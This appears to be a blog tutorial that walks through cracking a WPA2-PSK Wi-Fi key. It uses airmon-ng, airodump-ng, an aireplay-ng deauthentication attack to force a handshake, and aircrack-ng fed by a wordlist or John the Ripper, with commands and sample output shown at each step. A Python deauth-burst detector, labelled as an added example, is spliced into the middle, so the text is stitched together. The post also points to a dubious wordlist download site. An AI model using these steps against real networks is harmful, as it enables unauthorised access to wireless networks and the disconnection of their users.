Follow my steps carefully and you will get it worked out.
Now put the card in monitor mode by typing:
airmon-ng start wlan0
Remember that the interface name (wlan0, mon0, ath0) depends on your setup.
Okay, now let's check the networks around us:
airodump-ng mon0
Wait 2 minutes, then press Control + Z.
Copy the MAC address of the AP, the channel, and so on.
Now monitor the AP, writing all packets to a file:
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
At this point you have 2 options: either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let's force the deauthentication. We need the BSSID of the AP (-a) and the MAC of a connected client (-c):
aireplay-ng -0 1 -a (AP mac Address) -c (Client mac address) mon0
Now it will deauthenticate a client, so when it reconnects you capture the handshake:
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
That's how it looks when it works.
As a result, airodump-ng should show “WPA Handshake:” in the upper right corner.
Stop airodump-ng and make sure the files were created properly.
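The aireplay-ng output above is also what the attack looks like from the other side: a legitimate disconnect produces one or two deauthentication frames, while an injected burst produces dozens per second to one station. The following is an added detection example (not part of this tutorial, and not aircrack-ng code): it walks a stream of management frame records and raises an alert when deauth/disassoc frames to one station exceed a threshold within a short window. The record format, the window and threshold values, and the sample frames are all constructed for the example; the AP and client addresses reuse the ones shown in the output above.

```python
"""Detect deauthentication bursts in 802.11 management frame records.

Added example for this post; not part of the original tutorial.
Frame records are assumed to be (timestamp, subtype, bssid, station)
tuples, sorted by timestamp, e.g. exported from a monitor-mode capture.
"""
from collections import defaultdict, deque

# Assumed thresholds: a normal client disconnect sends one or two deauth
# frames; the post's aireplay output shows 64 in about one second.
WINDOW_SECONDS = 2.0
DEAUTH_THRESHOLD = 10


def detect_deauth_bursts(frames, window=WINDOW_SECONDS, threshold=DEAUTH_THRESHOLD):
    """Return one alert per (bssid, station) pair whose deauth/disassoc count
    within `window` seconds reaches `threshold`.

    Alerts are (first_seen_ts, bssid, station, count_in_window) tuples.
    Beacons, data and other subtypes are ignored.
    """
    recent = defaultdict(deque)   # (bssid, station) -> timestamps in window
    alerted = set()               # alert once per pair, not once per frame
    alerts = []
    for ts, subtype, bssid, station in frames:
        if subtype not in ("deauth", "disassoc"):
            continue
        key = (bssid, station)
        q = recent[key]
        q.append(ts)
        # Drop timestamps that fell out of the sliding window.
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((q[0], bssid, station, len(q)))
    return alerts


def sample_frames():
    """Constructed sample: beacons, one legitimate disconnect, one injected burst."""
    bssid = "00:19:5B:52:AD:F7"    # AP address from the post
    victim = "00:1C:BF:90:5B:A3"   # client address from the post
    other = "00:11:22:33:44:55"    # constructed second client
    frames = []
    for i in range(30):            # ~3 s of beacons at 10/s (ignored by the detector)
        frames.append((i * 0.1, "beacon", bssid, "ff:ff:ff:ff:ff:ff"))
    frames.append((1.5, "deauth", bssid, other))          # a single, benign deauth
    for i in range(64):                                   # 64 deauths in one second
        frames.append((2.0 + i / 64.0, "deauth", bssid, victim))
    frames.sort(key=lambda f: f[0])
    return frames


if __name__ == "__main__":
    for first_ts, bssid, sta, n in detect_deauth_bursts(sample_frames()):
        print(f"ALERT t={first_ts:.2f}s {n} deauth frames from {bssid} to {sta} "
              f"within {WINDOW_SECONDS}s")
```

The single deauth to the second client never trips the threshold, so it produces no alert; the burst to the victim does, as soon as the tenth frame lands inside the two-second window. In a real deployment the thresholds would be tuned against the normal roaming rate of the network.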
From this point forward, you do not need to be anywhere near the wireless network. All cracking happens offline, so you can stop airodump and the other processes and even walk away from the AP. In fact, I would suggest walking away and finding yourself a cosy place where you can live, eat, sleep, etc. Cracking a WPA2 PSK key is based on brute-forcing, and it can take a very, very long time. There are 2 ways of brute-forcing: one that is relatively fast but does not guarantee success, and one that is very slow but guarantees that you will find the key at some point in time.
The first option is to use a wordlist/dictionary file. A lot of these files can be found on the internet (e.g. http://0a9c9e1f.youfap.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the wordlist and feed it the .cap file that contains the WPA2 handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run:
aircrack-ng -w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
The second option is to pipe John The Ripper's incremental mode straight into aircrack-ng, which is the slow but exhaustive approach:
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap
(Note: the PSK in my test lab is only 8 characters and contains one uppercase character and 4 digits.) I will post the output once the key has been cracked, including the time it took to crack it.
That’s it
Update: after 20 hours of cracking, the key still has not been found. The system I'm using to crack the keys is not very fast, but let's look at some facts:
8 characters, plain letters (lowercase and uppercase) or digits = each character in the key could have 26+26+10 (62) possible values. So the maximum number of combinations that need to be checked in the brute-force process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896. At about 600 keys per second on my “slow” system, it could take more than 101083382 hours to find the key (11539 years). I have stopped the cracking process as my machine is way too slow to crack the key while I'm still alive… So think about this when choosing a WPA2 PSK key.